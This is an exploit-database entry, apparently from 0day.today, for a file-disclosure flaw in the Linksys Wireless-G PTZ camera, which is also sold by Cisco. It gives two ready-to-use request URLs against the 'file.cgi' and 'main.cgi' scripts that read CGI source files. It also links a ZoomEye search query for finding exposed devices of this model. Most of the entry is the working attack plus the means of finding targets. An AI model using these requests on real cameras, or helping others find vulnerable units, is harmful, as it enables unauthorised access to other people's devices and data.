Linksys Wireless-G PTZ Access Sensitive Files Vulnerability

2017-04-11T00:00:00
ID 1337DAY-ID-27565
Type zdt
Reporter whitepacket
Modified 2017-04-11T00:00:00

Description

Exploit for hardware platform in category web applications

                                        
                                            Also sold by Cisco, this device, which can be found on ZoomEye here: https://www.zoomeye.org/search?q=Basic%20realm%3D%22Authorization%22%20Boa/0.94.13%20port%3A80&p=4&t=host has a vulnerability in which you can read some sensitive files in the local directory, such as the content of the CGI scripts.

http://TARGET/adm/file.cgi?next_file=file.cgi
http://TARGET/main.cgi?next_file=main.cgi

#  0day.today [2018-04-04]  #